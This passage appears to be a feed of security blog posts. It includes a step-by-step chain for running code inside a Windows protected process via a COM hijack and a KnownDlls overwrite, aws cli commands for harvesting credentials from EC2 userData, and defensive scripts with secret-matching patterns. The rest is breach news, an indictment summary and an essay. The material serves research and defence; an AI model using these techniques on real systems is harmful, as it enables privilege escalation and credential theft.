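        if m:
            current = keys.setdefault((m.group(1), m.group(2)), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # .reg files escape backslashes inside quoted data.
            name = m.group(1) or "(Default)"
            current[name] = m.group(2).replace("\\\\", "\\")
    return keys


def find_shadowed_classes(text):
    """Report CLSIDs whose HKCU in-process registration shadows an HKLM one."""
    machine, user = {}, {}
    hives = {"HKEY_LOCAL_MACHINE": machine, "HKEY_CURRENT_USER": user}
    for (hive, key), values in parse_reg_export(text).items():
        m = INPROC_RE.match(key)
        if m and hive in hives:
            hives[hive][m.group(1).upper()] = values

    findings = []
    for clsid in sorted(user):
        if clsid not in machine:
            continue  # per-user-only class: nothing is being shadowed
        changes = []
        for name in ("(Default)", "ThreadingModel"):
            before = machine[clsid].get(name)
            after = user[clsid].get(name)
            if (before or "").lower() != (after or "").lower():
                changes.append(f"{name}: {before!r} -> {after!r}")
        findings.append({
            "clsid": clsid,
            "watched": clsid == WATCHED_CLSID,
            "changes": changes,
        })
    return findings


# Constructed sample export: one shadowed class, one per-user-only class.
SAMPLE_EXPORT = r'''
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}\InprocServer32]
@="C:\\Windows\\System32\\placeholder.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}\InprocServer32]
@="C:\\Windows\\System32\\placeholder.dll"
"ThreadingModel"="Free"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\ExampleApp\\shell.dll"
"ThreadingModel"="Apartment"
'''

if __name__ == "__main__":
    for finding in find_shadowed_classes(SAMPLE_EXPORT):
        flag = "WATCHED " if finding["watched"] else ""
        print(f"{flag}{finding['clsid']}: {'; '.join(finding['changes']) or 'identical values'}")
```

A per-user entry that shadows a machine-wide class is worth reviewing even when the values match, so the function reports it with an empty change list rather than dropping it.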

What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:

  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?

Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.

The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair, SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ? can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements.

Wrapping Up

In conclusion, to get arbitrary code execution inside a PP-WindowsTCB process without administrator privileges we can do the following:

  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.

That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL doesn’t for the most part.  I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.

Marriott Confirms Breach Impacts As Many As 500 Million Guests

Marriott International has disclosed that the guest reservation database of its Starwood division has been breached, affecting as many as 500 million guests. The company has also confirmed that there has been unauthorized access to the Starwood network since 2014.

According to a report from the BBC, for roughly 327 million guests, the attacker was able to access personally identifiable information including a combination of name, address, phone number, email address, passport number, account information, date of birth, and gender. In some cases, the compromised records also included encrypted credit card information. The company is still trying to determine whether or not the encryption keys have also been stolen.

In a statement, Marriott said that on Sept. 8 of this year, it received an alert from an internal security tool that an unauthorized user had attempted to access the Starwood database in the US. An investigation into the incident confirmed that an attacker had indeed copied and encrypted the information. Marriott was able to decrypt the information to confirm that the contents were from the Starwood guest reservation database.

While it is still unclear how the attackers penetrated the organization, Chris Wysopal, co-founder & CTO of Veracode, said that the breach could have gone undetected on the network for so long because attackers are getting better at making sure their attacks don’t contain indicators of compromise (IoC).

Marriott bought Starwood - which owns brands including the W Hotels, Sheraton, Le Méridien, and Four Points by Sheraton - in 2016 to create the largest hotel chain in the world. Marriott-branded hotels use a separate reservation system on a different network.

The incident has been reported to both law enforcement and regulatory authorities, and the UK's data regulator is investigating. While Marriott is headquartered in the US, it works with and hosts European citizens, so it must ensure that it meets GDPR compliance. It’s anticipated that Marriott International will receive a substantial penalty because of the size and scale of the breach. Wysopal said that given that this is one of the first major breaches under both GDPR and the new California Consumer Privacy Act, “it will be a bellwether for breaches to come.”

“On a scale of 1 to 10 and up, this is one of those No. 10 size breaches. There have only been a few of them of this scale and scope in the last decade,” Wysopal told AP in an interview.

Marriott is emailing guests affected by the breach and will not send emails with any attachments. Additionally, the company is offering its guests a free membership to WebWatcher, a personal information monitoring service, and is instructing guests to watch their loyalty accounts, change their passwords, and check credit card statements for unauthorized activities. An informational website and call center have also been set up to support guests during the investigation.

How to enable 2FA on Twitter with Authy, Google Authenticator or another Mobile Application

It’s been a long time since I have had to enable 2FA on Twitter and found the process completely infuriating. Twitter’s 2FA configuration uses SMS as the default option, this...

The post How to enable 2FA on Twitter with Authy, Google Authenticator or another Mobile Application appeared first on PerezBox.

AWS EC2 instance userData

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time. 


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That's interesting right?!?!  so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"
    }
}


anyway that can get tedious especially if the org has a ton of things running.  This is precisely the reason @cktricky and I built weirdAAL.  Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops through all the regions and any instances it finds and queries for the userData attribute.  Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG
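The same check can be run offline as an account audit. This added example is not weirdAAL code or the author's; it takes saved describe-instance-attribute responses, decodes UserData, and reports which lines look like embedded credentials without echoing the values. The second and third instance IDs, the boot script and the pattern list are constructed, and the key pair in the script is the placeholder pair used in AWS documentation.

```python
import base64
import gzip
import re

# Constructed pattern list: a starting point, not a complete secret scanner.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_assignment": re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*\S+"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*\S+"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def decode_user_data(response):
    """Return the decoded userData text, or None if the instance has none."""
    value = response.get("UserData", {}).get("Value")
    if not value:
        return None
    raw = base64.b64decode(value)
    if raw[:2] == b"\x1f\x8b":  # cloud-init also accepts gzip-compressed user data
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")


def audit_user_data(responses):
    """Return (instance_id, line_number, pattern_name) for each suspicious line.

    The matched text is deliberately left out so the report does not become
    another copy of the secret.
    """
    findings = []
    for response in responses:
        text = decode_user_data(response)
        if text is None:
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            for label, pattern in SECRET_PATTERNS.items():
                if pattern.search(line):
                    findings.append((response["InstanceId"], lineno, label))
    return findings


# Constructed boot script of the kind the post jokes about.
CONSTRUCTED_SCRIPT = (
    "#!/bin/bash\n"
    "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
    "export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    "mysql -u app --password=hunter2 < /opt/seed.sql\n"
)

SAMPLE_RESPONSES = [
    # Response shown in the post.
    {"InstanceId": "i-0XXXXXXXX", "UserData": {"Value": "bm90IHRvZGF5IElTSVMgOi0p"}},
    # Constructed: instance launched with the script above.
    {"InstanceId": "i-0YYYYYYYY",
     "UserData": {"Value": base64.b64encode(CONSTRUCTED_SCRIPT.encode()).decode()}},
    # Constructed: instance launched without user data.
    {"InstanceId": "i-0ZZZZZZZZ", "UserData": {}},
]

if __name__ == "__main__":
    for instance_id, lineno, label in audit_user_data(SAMPLE_RESPONSES):
        print(f"{instance_id}: line {lineno} matches {label}")
```

Anything this flags should be rotated and moved out of userData, since any principal allowed to call DescribeInstanceAttribute can read it.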

Playbook Fridays: OneMillion API Component

Using this Playbook Component, incident responders and analysts can check if a given domain exists on any lists of the most frequently visited hostnames.

ThreatConnect developed the Playbooks capability to help analysts automate time-consuming and repetitive tasks so they can focus on what is most important and, in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

What?

This week, we are featuring a Playbook Component which finds the rank of a given host in a list of the one million, most visited hostnames. In this post, we are going to introduce why this component is useful, discuss why it is a Playbook Component rather than a Playbook, and show you how to use this component (if you have Playbooks enabled in your ThreatConnect instance, you can create a Playbook to use this component in less than five minutes).

Why?

If a Host Indicator is one of the top million, most visited domains, this usually merits further investigation. It could be that a host in the list is benign (perhaps it is a false positive or perhaps a malware sample calls back to a benign host to test its internet connection or get its IP address). It could alternatively mean that the host is malicious and simply getting a lot of traffic. Either way, it’s helpful to have this information. This Playbook Component, built on the OneMillion API (which is not maintained by ThreatConnect), allows incident responders and analysts to check if a given domain exists on any lists of the most frequently visited hostnames.

Why a component?

Before we talk about how to use this component, let’s address why this system was created as a Playbook Component rather than normal Playbook. The major benefit of components is that you can capture a common process you would like to repeat in multiple, diverse places. For example, if you are making a Playbook which requires you to get the length of a string, you could add apps to get the length of a string to that Playbook, but if you ever need to get the length of a string again, you will have to recreate what you have already done. Instead, if you are creating a generic function or one that you would like to use in multiple playbooks, consider creating a component. A component lets you perform an operation again and again without having to recreate anything (and by the way, there is a component to get the length of a string described here (this site is not maintained by ThreatConnect)). In the case of the OneMillion API Component, it was created as a component so that it is easy to plug into new and existing playbooks.

Using the component

So how do you use this component? In this section, we’ll walk through the installation of the component and will create a Playbook to use the component to show you how easy it is to use components to expand the functionality of a Playbook.

  1. The first step is to install the component. You can download it from https://tc.hightower.space/post/playbook-components/onemillion-api-query/ (which is not maintained by ThreatConnect) or download the “Query OneMillion API.pbx” file from GitHub.
  2. Once you have downloaded the component, you can import it into ThreatConnect like a Playbook by going to the “Playbooks” tab in ThreatConnect and clicking “New” > “Import” (on ThreatConnect versions before 5.7, you can click the “Import” button). Then import the Query OneMillion API.pbx file.
  3. Turn it on and the component is ready to be used!
  4. Now that we have installed and activated the “Query OneMillion API” component, we need to create a Playbook to use it. To do this, go back to the “Playbooks” tab in ThreatConnect and create a new Playbook. For this example, we are going to create a Playbook with a User Action trigger that will allow users to submit a host indicator in ThreatConnect to the OneMillion API and return the result with a single click.
  5. To build this Playbook, select the “Trigger” tab in the pane on the left and select “UserAction”. This will add the trigger to the design canvas. Now, double click on the new trigger to edit it. Rename the trigger in the “User Action Name” field (this name will show up for users when viewing Host indicators in ThreatConnect). Select “Host” for the “Type” field, click through the next section, and save the trigger.
  6. Now, click the “App” tab in the pane on the left and select the “Query OneMillion API” from the “Components” section. If it does not show up, this is probably because the “Query OneMillion API” component you installed in step two is not turned on (as we did in step three). Assuming you were able to find the “Query OneMillion API” component and add it to the design canvas, drag a line from the blue dot on the trigger to the component. Double click on the component to edit it. In the “Host” field, start typing “#” and a list of available options will show up. Select “trg.action.item” (this is the hostname which is captured by the User Action trigger); this means that the hostname from which the Playbook was triggered will be sent to the OneMillion API (if this doesn’t make sense, watch the gif above for a demo that will clarify how this system works). Save the “Query OneMillion API” component.
  7. Now, draw a line between the blue dot on the “Query OneMillion API” component and the trigger. This allows us to send information back to the user via the trigger. Double click on the trigger to edit it. Click “Next” to move to the second stage (you should see a text area with the label “Body”). In the text area, start typing “#” (again, this shows you a list of available values you can send back to the user). Select “hostRank” and save the trigger.
  8. Turn the Playbook on by clicking the “Active” toggle in the upper right-hand corner.
  9. Now for the fun part: using the Playbook! Find or create a host indicator in your ThreatConnect instance. There should be a “Playbook Actions” card on the top-right side of the indicator’s page and it should list the name of the User Action trigger you provided in step five (if you didn’t change the name of the User Action trigger, it will probably show up as “UserAction Trigger 1”). When you click it, the Playbook will be executed and the rank of the host (if there is one) will be returned to the right of the trigger. You now have a Playbook which lets analysts query the OneMillion API!

If you have completed the steps above and would like to contribute your playbook with the trigger in it, there are instructions for contributing to our playbooks repository here: https://github.com/ThreatConnect-Inc/threatconnect-playbooks/wiki/Contributions-Workflow .

If you have any questions or run into any problems with this playbook component, please raise an issue in Github. As always, let us know if you have any questions!

The post Playbook Fridays: OneMillion API Component appeared first on ThreatConnect | Intelligence-Driven Security Operations.

Hackers targeted Dell customer information in attempted attack

Earlier this month, hackers attempted to breach Dell's network and obtain customer information, according to the company. While it says there's no conclusive evidence the hackers were successful in their November 9th attack, it's still possible they obtained some data.

Via: The Verge

Source: Dell (1), (2)

Two Iranian Hackers charged with $6 Million in SamSam Ransomware Attacks

Today the Department of Justice announced an indictment against two Iranian men, Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, for their roles in stealing more than $6 million in ransom payments from a 34-month-long ransomware campaign known as SamSam.

They were charged with:

18 U.S.C. § 371 - Conspiracy to Defraud the United States

18 U.S.C. § 1030(a)(5)(A) - knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;

18 U.S.C. § 1030(a)(7)(C) - demand or request for money or other thing of value in relation to damage to a protected computer, where such damage was caused to facilitate the extortion

18 U.S.C. § 1349 - Conspiracy

Victims were found in nearly every state:

Victim Locations from: https://www.justice.gov/opa/press-release/file/1114736/download


Piecing together the case involved gaining cooperation from two European VPN services, and apparently at least one search engine.   The indictment refers, for example, to the defendants using Bitcoin to pay for access to a European VPS, and then searching on May 15, 2016, for "kansasheart.com".  The same day, they accessed the public website of Kansas Heart Hospital, and on May 18th, encrypted many key computers on the network and sent their ransom note.

Another key part of the investigation was gaining the cooperation of a Bitcoin Exchanger, which was able to demonstrate that on July 21, 2016, the defendants cashed out at least some of their ransomed Bitcoin into Iranian Rials and deposited it into bank accounts controlled by MANSOURI and SAVANDI.

Chat logs were also available to the investigators, as the indictment mentions contents of chat consistently throughout their timeline.  Using the combination of events, some of the key dates were:

  • December 14, 2015 - Defendants chatting about the development and functionality of SamSam.
  • Jan 11, 2016 - Attack on Mercer County Business in New Jersey 
  • Feb 5, 2016 - Attack on Hollywood Presbyterian Medical Center 
  • March 27, 2016 - Attack on MedStar Health 
  • May 15, 2016 - Attack on Kansas Heart Hospital 
  • May 27, 2016 - Attack on University of Calgary 
  • July 27, 2016 - Attack on Nebraska Orthopedic Hospital 
  • April 25, 2017 - Attack on City of Newark, New Jersey 
  • January 18, 2018 - Attack on Allscripts Healthcare Solutions, Inc. 
  • February 19, 2018 - Attack on Colorado Department of Transportation 
  • March 22, 2018 - Attack on City of Atlanta, Georgia 
  • July 14, 2018 - Attack on LabCorp 
  • September 25, 2018 - Attack on the Port of San Diego 
FBI Wanted Poster from: https://www.justice.gov/opa/press-release/file/1114746/download

Breaking down Dell’s “potential cybersecurity incident” announcement

With numerous regulations and laws like the European Union’s General Data Protection Regulation putting pressure on enterprises to go public with cybersecurity incidents, we’ve seen a trend of businesses disclosing breaches first and filling in the details later.

Dell provided the latest example of this trend Wednesday, announcing a “potential cybersecurity incident” that it detected earlier in the month. But despite the disclosure, it’s unclear if Dell should be celebrating or preparing for class action lawsuits. Let’s take a closer look at Dell’s notification.

First, there’s the headline — “Dell Announces Potential Cybersecurity Incident” – which is somewhat confusing because according to Dell itself, there most definitely was an incident. The company says “it detected and disrupted unauthorized activity on its network attempting to extract Dell.com customer information, which was limited to names, email addresses and hashed passwords.” It sounds like Dell thinks there was a potential breach rather than a potential cybersecurity incident.

Regardless, Dell apparently stopped the intrusion before attackers could steal any data, which is good news. But Dell qualified that statement with this portion of the announcement: “Though it is possible some of this information was removed from Dell’s network, our investigations found no conclusive evidence that any was extracted.”

The absence of evidence, however, doesn’t mean the attackers were unsuccessful. We don’t have any idea how long Dell thinks the intrusion lasted – only that it detected the unauthorized activity on Nov. 9. But we do know that the threat actor or actors attempted to extract customer data, and that it was limited to just names, email addresses and hashed passwords – though we don’t know how they were hashed (hopefully not MD5 or a similarly weak algorithm, and hopefully securely salted).

On the positive side, Dell seemed fairly confident about the scope of the intrusion. “Credit card and other sensitive customer information was not targeted,” the company said in its notification. “The incident did not impact any Dell products or services.”

The company added that it had “implemented countermeasures,” including “the hashing of our customers’ passwords and a mandatory Dell.com password reset.” Password resets are standard operating procedure for any incident, so it’s hard to judge just how severe this potential cybersecurity incident is for Dell based on those reactions. It’s also unclear what Dell means by “hashing the customer passwords.” (Did they rehash them after they were reset? Did they hash them with something different this time around? Did they add salt?)

Nevertheless, it sounds like Dell has contained the issue. The company said it’s investigating the intrusion, hired a third-party firm to conduct a separate, independent investigation, and also engaged law enforcement.

Dell’s announcement raises an important question: is this a cybersecurity win for the company? Based on the information available, Dell was able to detect threat actors on its network and stop them before they successfully extracted any data. That sounds like a win.

However, there are a lot of unknowns that could dampen the positives. We don’t know for sure that no customer data was exfiltrated, we don’t know how long the intrusion lasted, and we don’t know how the threat actors gained the unauthorized access in the first place (if it was, for example, a website flaw that was disclosed a year earlier but never fixed, then that would be bad). The answers to those questions could significantly alter the narrative.

It’s likely we’ll hear more from Dell about this incident down the road. For now, we’ll be left to wonder whether Dell gets to chalk this up as a win or if it’s yet another negative cybersecurity headline.

 

The post Breaking down Dell’s “potential cybersecurity incident” announcement appeared first on Security Bytes.

Searching for Cisco Umbrella Alternatives? Your Affordable Option for DNS Security with Advanced Reporting.

Looking for an affordable alternative to Cisco Umbrella Enterprise's high cost? ThreatSTOP comes with advanced reporting and security research tools out-of-the-box. See blocked threats, remediate client machines faster and check IOCs. Here's a breakdown of how ThreatSTOP and Cisco line up.

Announcing the Google Security and Privacy Research Awards



We believe that cutting-edge research plays a key role in advancing the security and privacy of users across the Internet. While we do significant in-house research and engineering to protect users’ data, we maintain strong ties with academic institutions worldwide. We provide seed funding through faculty research grants, cloud credits to unlock new experiments, and foster active collaborations, including working with visiting scholars and research interns.

To accelerate the next generation of security and privacy breakthroughs, we recently created the Google Security and Privacy Research Awards program. These awards, selected via internal Google nominations and voting, recognize academic researchers who have made recent, significant contributions to the field.

We’ve been developing this program for several years. It began as a pilot when we awarded researchers for their work in 2016, and we expanded it more broadly for work from 2017. So far, we have awarded $1 million to 12 scholars. We are preparing the shortlist for 2018 nominees and will announce the winners next year. In the meantime, we wanted to highlight the previous award winners and the influence they’ve had on the field.

2017 Awardees

Lujo Bauer, Carnegie Mellon University
Research area: Password security and attacks against facial recognition

Dan Boneh, Stanford University
Research area: Enclave security and post-quantum cryptography

Aleksandra Korolova, University of Southern California
Research area: Differential privacy

Daniela Oliveira, University of Florida
Research area: Social engineering and phishing

Franziska Roesner, University of Washington
Research area: Usable security for augmented reality and at-risk populations

Matthew Smith, Universität Bonn
Research area: Usable security for developers


2016 Awardees

Michael Bailey, University of Illinois at Urbana-Champaign
Research area: Cloud and network security

Nicolas Christin, Carnegie Mellon University
Research area: Authentication and cybercrime

Damon McCoy, New York University
Research area: DDoS services and cybercrime

Stefan Savage, University of California San Diego
Research area: Network security and cybercrime

Marc Stevens, Centrum Wiskunde & Informatica
Research area: Cryptanalysis and lattice cryptography

Giovanni Vigna, University of California Santa Barbara
Research area: Malware detection and cybercrime


Congratulations to all of our award winners.

Will cybersecurity safety ever equal air travel safety?

Aviation safety provides an aspirational model of a safety success story when you consider that over the past 50 years, even as total passenger miles have exploded, commercial airline fatalities have plummeted.

The commercial aviation industry has an admirable safety record, but can the lessons learned over the past decades in that industry be extended to improve the state of cybersecurity safety? When it comes to the ongoing discussion about issues related to cybersecurity safety, some of the most respected names in the business have been making an important case that we need to do much better.

The improvements in aviation safety are inarguably worth it: as the number of passengers carried annually has increased by an order of magnitude, the average number of fatal airline accidents has plummeted: flying is now anywhere from 100 to 1,000 times safer than driving, depending on the evaluation criteria used.

Former Facebook CISO Alex Stamos tweeted in October: “It would be great to move InfoSec norms closer to aviation safety, where close-calls are disclosed in a standard, centralized manner and discussed rationally by experts who extract lessons from the mistakes of others,” adding “we currently don’t live in that world.”

In the world we inhabit, cybersecurity safety seems to be modeled more on automotive safety than aviation safety, and that’s the problem.

The U.S. National Highway Traffic Safety Administration reported that 37,461 people died in traffic accidents in 2016; the same year, the Aviation Safety Network reported that 258 people died in commercial airline accidents. Unlike drivers, pilots must undergo extensive and ongoing training, must perform extensive system checks on their aircraft before leaving the hangar, and are held accountable for any incident that occurs while the aircraft is under their control.

Clearly, cybersecurity safety has a long way to go, still. As Kevin Beaumont, the U.K.-based security researcher, pointed out in November: “Usually it’s us, the IT bods, being idiots for building a system so fragile one employee can bring down by clicking the ‘wrong’ link. Imagine if planes were built so the passenger could bring down a plane by pressing a button at their seat.”

Under the current model, cybersecurity safety depends on the expectation that billions of end users will be knowledgeable about cyber threats and how to defend against them as well as being aware of the need for antimalware software and patching and staying up to date on security practices and generally taking the initiative to maintain cybersecurity hygiene while also reporting any cyber incidents.

Put another way, every connected device is covered with buttons, any one of which, if pressed at the wrong moment, could “bring down” not just that device, but any number of other connected devices.

Cybersecurity safety is still up in the air, so to speak, for many reasons starting with a lack of sensible regulations and agencies to investigate, share and learn from failures. But disastrous cybersecurity safety failures aren’t seen as harming the whole industry. Consider what Mikko Hypponen, chief research officer at F-Secure, tweeted this week about one magnificent, ongoing failure of security: “I can’t believe that we are *still* fighting Office macro malware now, 20 years later.”

Airlines have a vested interest in keeping air travel safe because if passengers fear for their lives many of them will stop paying to fly. Even if they don’t particularly want to be regulated, those airlines will still accept government safety regulation because safer skies mean fewer losses from crashed planes as well as more passengers willing to pay to ride on safer planes.

The tech sector needs to step up and accept responsibility for cybersecurity safety in the same way the aviation industry did for air travel safety, and that will only begin when vendors are held to higher standards; when vendors, enterprises and government agencies can agree to investigate cyber incidents and focus on cooperation in using that information to improve cybersecurity safety; and when consumers and all end-users can be confident that they can use their devices and the internet safely — and without being victim-blamed when things do, inevitably, go wrong.

The post Will cybersecurity safety ever equal air travel safety? appeared first on Security Bytes.

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of PowerShell and Windows command lines respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) has demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion “simple” means generally short and relatively uncomplicated, but can still contain obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produces many boundary cases where simple heuristics to detect if a script is obfuscated (e.g. length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is feasible yet impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as authors evolve to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

